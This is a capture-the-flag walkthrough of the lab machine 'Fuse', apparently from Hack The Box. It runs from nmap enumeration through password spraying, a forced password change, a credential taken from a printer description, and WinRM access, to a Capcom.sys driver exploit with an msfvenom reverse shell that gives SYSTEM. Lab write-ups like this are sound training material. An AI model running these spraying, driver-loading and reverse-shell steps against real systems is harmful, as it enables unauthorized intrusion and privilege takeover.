Fuse
Enumeration
As usual, we start with an nmap scan, in order to find open ports in the target machine.
The following nmap command will scan the target machine looking for open ports quickly and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.193 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Fri Jan 7 21:16:49 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.193
Warning: 10.10.10.193 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.193
Host is up (0.100s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
5985/tcp open wsman
9389/tcp open adws
49666/tcp open unknown
49667/tcp open unknown
49675/tcp open unknown
49676/tcp open unknown
49678/tcp open unknown
49700/tcp open unknown
# Nmap done at Fri Jan 7 21:17:29 2022 -- 1 IP address (1 host up) scanned in 40.16 secondsAs we see, there are quite a lot of ports open.
Let's try to obtain the services and versions of these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p53,80,88,135,139,389,445,464,593,636,3268,5985,9389 10.10.10.193 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Fri Jan 7 21:18:38 2022 as: nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,5985,9389 -oN targeted 10.10.10.193
Nmap scan report for 10.10.10.193
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-07 20:31:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h53m00s, deviation: 4h37m10s, median: 12m59s
| smb2-time:
| date: 2022-01-07T20:31:53
|_ start_date: 2022-01-07T20:29:22
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Fuse
| NetBIOS computer name: FUSE\x00
| Domain name: fabricorp.local
| Forest name: fabricorp.local
| FQDN: Fuse.fabricorp.local
|_ System time: 2022-01-07T12:31:56-08:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan 7 21:19:35 2022 -- 1 IP address (1 host up) scanned in 57.23 secondsFirst things first, let's add the domain names to the /etc/hosts file.
nano /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 alfa8sa-virtualbox
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
f02::2 ip6-allrouters
10.10.10.193 fabricorp.local fuse.fabricorp.localIf we take a look at the website on http://10.10.10.193, we'll see a printer website.
We can see on the Print Logs section, three logs. If we click on the View button of each log, we'll see some users.
Exploitation
Let's add the users pmerton, tlavel, sthompson, bhult and administrator to a file. At this point, we can use the cewl tool. This tool makes a dictionary based on a web page.
cewl -w passwords http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers
-wwrite the output to a file.--with-numbersaccept words with numbers.
Now that we've got some users and passwords, we can try to brute force the SMB service with crackmapexec. The following command will try to log in with each users, and with each password from the dictionary. It continues trying in spite of finding valid credentials, and it doesn't show logon failures.
crackmapexec smb 10.10.10.193 -u users -p passwords --continue-on-success | grep -v FAILURE
-uusers file.-ppasswords file.---continue-on-successcontinues authentication attempts even after successes.-vselect lines which don't match.
SMB 10.10.10.193 445 FUSE [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\tlavel:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE
SMB 10.10.10.193 445 FUSE [-] fabricorp.local\bhult:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE It found that the Farbricorp01 password must be changed for the users tlavel and bhult.
The idea here, is to change the password of the bhult user, and then log in into the RPC server. Once we are logged in, we can enumerate all the domain users, as we have done in other HTB machines. Let's change the bhult password remotely with the smbpasswd tool.
smbpasswd -r 10.10.10.193 -U "bhult"
Old SMB password: Fabricorp01
New SMB password: alfa8sa!$
Retype new SMB password: alfa8sa!$
Password changed for user bhult on 10.10.10.193.Now let's log with the user bhult and the password alfa8sa!$ into the RPC server.
You will have to log in into the RPC server quickly, because there is a scheduled task that changes the password that you've just already changed.
rpcclient -U 'bhult%alfa8sa!$' 10.10.10.193
rpcclient $>From here we can enumerate several things. The first one are the domain users.
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]We can clean the output of the domain users and write it into a file.
rpcclient -U 'bhult%alfa8sa!$' 10.10.10.193 -c "enumdomusers" | grep -oP "\[.*?\]" | grep "0x" -v | tr -d "[]" > users
We can also enumerate printers. If we do it, we'll see a password at the description of the printer.
rpcclient $> enumprinters
flags:[0x800000]
name:[\\10.10.10.193\HP-MFT01]
description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
comment:[]Now we have a list of the domain users and the $fab@s3Rv1ce$1 password, let's see if we can have a shell via winrm as any user with that password.
crackmapexec winrm 10.10.10.193 -u users -p '$fab@s3Rv1ce$1' --continue-on-success
-uusers file.-ppasswords file.---continue-on-successcontinues authentication attempts even after successes.
WINRM 10.10.10.193 5985 FUSE [*] Windows 10.0 Build 14393 (name:FUSE) (domain:fabricorp.local)
WINRM 10.10.10.193 5985 FUSE [*] http://10.10.10.193:5985/wsman
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\Administrator:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\Guest:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\krbtgt:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\DefaultAccount:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [+] fabricorp.local\svc-print:$fab@s3Rv1ce$1 (Pwn3d!)
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\bnielson:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\sthompson:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\tlavel:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\pmerton:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\svc-scan:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\bhult:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\dandrews:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\mberbatov:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\astein:$fab@s3Rv1ce$1
WINRM 10.10.10.193 5985 FUSE [-] fabricorp.local\dmuir:$fab@s3Rv1ce$1And we see we can have a shell with the user svc-print and the password $fab@s3Rv1ce$1. Once we get the shell, we could grab the user flag.
evil-winrm -i 10.10.10.193 -u 'svc-print' -p '$fab@s3Rv1ce$1'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami
fabricorp\svc-print
*Evil-WinRM* PS C:\Users\svc-print\Documents> type \users\svc-print\desktop\user.txt
504c8acb72ed8276d310291e93713482Privilege Escalation
Let's see what privileges we have.
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledThe SeLoadDriverPrivilege privilege is enabled. If you search how to escalate privileges with that privilege enabled, you'll find a great article from Tarlogic which explains how to become the NT AUTHORITY\SYSTEM user.
The article explains that we have to use the EplLoadDriver tool. But, if we go to it's official github, we can only download a .ccp file. This means that we have to compile it on Windows.
First, let's create a folder on the desktop called FUSE, and open a command prompt inside it.
Next, let's download the EoPLoadDriver github repository, with the .cpp file on it.
git clone https://github.com/TarlogicSecurity/EoPLoadDriver/
Cloning into 'EoPLoadDriver'...
remote: Enumerating objects: 10, done.
remote: Total 10 (delta 0), reused 0 (delta 0), pack-reused 10
Receiving objects: 100% (10/10), 5.16 KiB | 1.72 MiB/s, done.
Resolving deltas: 100% (2/2), done.Then we'll have to open Visual Studio Code, and create a new project.
Select the Console App.
Insert the project name.
Once the project is open, we'll have to copy the eoploaddriver.cpp code and paste it into the project. Then we'll have to delete the first include line #include "stadfx.h".
To compile it, let's select Release and x64.
And finally, press Build > Rebuild Solution.
Once it ends, it will store the binary at C:\Users\alfa8sa\source\repos\EoPLoadDriver\x64\Release\EoPLoadDriver.exe. Let's move it to the FUSE folder.
It is also needed the Capcom.sys file. Download it from it's github, and move it to the FUSE folder.
Then, we'll have to download the ExploitCapcom.sln file and compile it with Visual Studio Code again. Let's clone the ExploitCapcom github repository.
Cloning into 'ExploitCapcom'...
remote: Enumerating objects: 58, done.
remote: Counting objects: 100% (24/24), done.
remote: Compressing objects: 100% (20/20), done.
remote: Total 58 (delta 11), reused 11 (delta 4), pack-reused 34
Receiving objects: 100% (58/58), 142.24 KiB | 2.54 MiB/s, done.
Resolving deltas: 100% (19/19), done.Then, on Visual Studio Code, press on File > Open > Project/Solution... and select the ExploitCapcom.sln file. Next, select the ExploitCapcom.cpp on the Solution Explorer section.
At the end of the code, we can see that the binary is executing the cmd.exe program. But I am going to change that, becouse I want to execute a malicious file called reverse.exe, which is going to send us back a reverse shell. To avoid AppLocker, I will put the malicious file in a directory listed on the UltimateAppLockerByPassList.
Then compile it like before, and move the binary to the FUSE folder.
Finally, we have the EopLoadDriver.exe, ExploitCapcom.exe and the Capcom.sys binaries on our FUSE folder.
Let's transfer those into our Linux machine with the http.server python module.
python -m http.server
On our Linux machine.
wget http://192.168.1.190:8000/EopLoadDriver.exe
wget http://192.168.1.190:8000/ExploitCapcom.exe
wget http://192.168.1.190:8000/Capcom.sys
Now we need to create the malicious file which will send us a reverse shell. It has to be named reverse.exe.
msfvenom -p windows/x64/shellreversetcp lhost=10.10.14.22 lport=4444 -f exe -o reverse.exe
Now we have to upload those binaries to the victim machine. We can do it with the Upload functionality from evil-winrm. Let's move to the C:\Windows\System32\spool\drivers\color directory on the victim machine, and upload them with evil-winrm.
upload EopLoadDriver.exe
upload ExploitCapcom.exe
upload Capcom.sys
upload reverse.exe
dir
Directory: C:\windows\system32\spool\drivers\color
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/11/2022 2:37 PM 10576 Capcom.sys
-a---- 7/16/2016 6:12 AM 1058 D50.camp
-a---- 7/16/2016 6:12 AM 1079 D65.camp
-a---- 2/11/2022 2:35 PM 15360 EopLoadDriver.exe
-a---- 2/11/2022 2:36 PM 1875968 ExploitCapcom.exe
-a---- 7/16/2016 6:12 AM 797 Graphics.gmmp
-a---- 7/16/2016 6:12 AM 838 MediaSim.gmmp
-a---- 7/16/2016 6:12 AM 786 Photo.gmmp
-a---- 7/16/2016 6:12 AM 822 Proofing.gmmp
-a---- 2/11/2022 2:37 PM 7168 reverse.exe
-a---- 7/16/2016 6:12 AM 218103 RSWOP.icm
-a---- 7/16/2016 6:12 AM 3144 sRGB Color Space Profile.icm
-a---- 7/16/2016 6:12 AM 17155 wscRGB.cdmp
-a---- 7/16/2016 6:12 AM 1578 wsRGB.cdmpBefore running the binaries, let's set a netcat listener on port 4444.
nc -lvnp 4444
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
Now all we have to do is run the following commands.
C:\windows\system32\spool\drivers\color\EopLoadDriver.exe System\CurrentControlSet\alfa8sa C:\windows\system32\spool\drivers\color\Capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\alfa8sa
NTSTATUS: 00000000, WinError: 0C:\windows\system32\spool\drivers\color\ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000038
[*] Shellcode was placed at 00000205D3BD0008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this programAnd we should get the reverse shell as the NT AUTHORITY\SYSTEM user. Then all we have to do is reap the harvest and take the root flag.
listening on [any] 4444 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.10.193] 49814
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\windows\system32\spool\drivers\color>whoami
whoami
nt authority\system
C:\windows\system32\spool\drivers\color>type \users\administrator\desktop\root.txt
type \users\administrator\desktop\root.txt
6ad78ce332c9a222c30b6108f4ed148fLast updated
Was this helpful?